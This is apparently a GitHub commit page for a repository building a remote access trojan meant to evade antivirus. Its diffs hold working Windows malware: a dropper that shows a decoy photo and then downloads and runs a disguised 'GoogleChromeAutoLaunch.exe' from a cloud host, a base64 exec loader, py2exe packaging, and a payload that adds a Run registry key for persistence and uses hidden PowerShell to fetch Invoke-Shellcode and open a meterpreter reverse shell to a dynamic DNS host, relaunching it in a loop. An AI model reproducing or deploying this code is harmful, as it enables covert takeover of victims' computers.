islamTaha
committed
Jun 28, 2016
1 parent
f9a5c79
commit 83d7433
Showing
10 changed files
with
181 additions
and
124 deletions.
@@ -1 +1 @@ | ||
##The goal of this repo is developing a virus which has ability to bypass AV | ||
##The goal of this repo is developing a simple RAT |
This file was deleted.
Empty file.
@@ -1,20 +1,20 @@ | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
exec (base64.b64decode(encode)) |
@@ -1,10 +1,10 @@ | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "try.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
) |
@@ -0,0 +1,38 @@ | ||
import requests | ||
import os | ||
import time | ||
import tempfile | ||
import subprocess | ||
|
||
#open photos | ||
os.startfile('test.jpg') | ||
time.sleep(1) | ||
os.startfile('test.jpg') | ||
|
||
|
||
# download virRu5 | ||
url = "http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe" | ||
while True: | ||
try: | ||
response = requests.get(url, stream=True) | ||
except: | ||
pass | ||
else: | ||
break | ||
|
||
# move to temp | ||
tempDirectory = tempfile.gettempdir() | ||
newFile = tempDirectory + "//GoogleChromeAutoLaunch.exe" | ||
|
||
with open(newFile, "wb") as handle: | ||
handle.write(response.content) | ||
|
||
# execute virRu5 | ||
subprocess.Popen(newFile) | ||
|
||
''' | ||
import shutil | ||
# copy file to temp | ||
tempDirectory = tempfile.gettempdir() | ||
shutil.copy('test.jpg',tempDirectory) | ||
''' |
Empty file.
@@ -0,0 +1,20 @@ | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
exec (base64.b64decode(encode)) |
@@ -0,0 +1,10 @@ | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
) |
@@ -1,85 +1,85 @@ | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
NO_IP_HOST = 'googlechromeauto.serveirc.com' | ||
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182" | ||
LPORT = 443 | ||
TIME_SLEEP = 10 | ||
|
||
TEMP_PATH = tempfile.gettempdir() | ||
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run" | ||
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312" | ||
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5' | ||
|
||
def set_reg_key_value(REG_PATH, name, value): | ||
try: | ||
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS) | ||
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value) | ||
except WindowsError: | ||
pass | ||
|
||
def fire(): | ||
if NO_IP_HOST: | ||
# Check if no-ip is online or not | ||
check_no_ip_online() | ||
|
||
if platform.machine().endswith('32'): | ||
try: | ||
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
else: | ||
try: | ||
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
|
||
def run_after_close(): | ||
foundIT = False | ||
runningProcess = [] | ||
for item in os.popen('tasklist').read().splitlines()[4:]: | ||
runningProcess.append(item.split()) | ||
for item2 in runningProcess: | ||
if "powershell.exe" in item2: | ||
foundIT = True | ||
|
||
if not foundIT: | ||
fire() | ||
|
||
|
||
def get_noip_ip_address(): | ||
global NO_IP_HOST | ||
global LHOST | ||
LHOST = socket.gethostbyname(NO_IP_HOST) | ||
|
||
|
||
def check_no_ip_online(): | ||
# Check if NoIP is online, If else dont fire | ||
NO_IP_HTTP = "http://" + NO_IP_HOST | ||
while True: | ||
try: | ||
urllib.urlopen(NO_IP_HTTP).getcode() | ||
except: | ||
time.sleep(10) | ||
else: | ||
get_noip_ip_address() | ||
break | ||
|
||
|
||
# set the reg value in run key | ||
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE) | ||
|
||
# fire the payload | ||
fire() | ||
time.sleep(5) | ||
|
||
# keep firing in case of the connection is loss | ||
while True: | ||
run_after_close() | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
NO_IP_HOST = 'googlechromeauto.serveirc.com' | ||
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182" | ||
LPORT = 443 | ||
TIME_SLEEP = 10 | ||
|
||
TEMP_PATH = tempfile.gettempdir() | ||
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run" | ||
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312" | ||
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5' | ||
|
||
def set_reg_key_value(REG_PATH, name, value): | ||
try: | ||
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS) | ||
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value) | ||
except WindowsError: | ||
pass | ||
|
||
def fire(): | ||
if NO_IP_HOST: | ||
# Check if no-ip is online or not | ||
check_no_ip_online() | ||
|
||
if platform.machine().endswith('32'): | ||
try: | ||
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
else: | ||
try: | ||
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
|
||
def run_after_close(): | ||
foundIT = False | ||
runningProcess = [] | ||
for item in os.popen('tasklist').read().splitlines()[4:]: | ||
runningProcess.append(item.split()) | ||
for item2 in runningProcess: | ||
if "powershell.exe" in item2: | ||
foundIT = True | ||
|
||
if not foundIT: | ||
fire() | ||
|
||
|
||
def get_noip_ip_address(): | ||
global NO_IP_HOST | ||
global LHOST | ||
LHOST = socket.gethostbyname(NO_IP_HOST) | ||
|
||
|
||
def check_no_ip_online(): | ||
# Check if NoIP is online, If else dont fire | ||
NO_IP_HTTP = "http://" + NO_IP_HOST | ||
while True: | ||
try: | ||
urllib.urlopen(NO_IP_HTTP).getcode() | ||
except: | ||
time.sleep(10) | ||
else: | ||
get_noip_ip_address() | ||
break | ||
|
||
|
||
# set the reg value in run key | ||
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE) | ||
|
||
# fire the payload | ||
fire() | ||
time.sleep(5) | ||
|
||
# keep firing in case of the connection is loss | ||
while True: | ||
run_after_close() | ||
time.sleep(TIME_SLEEP) |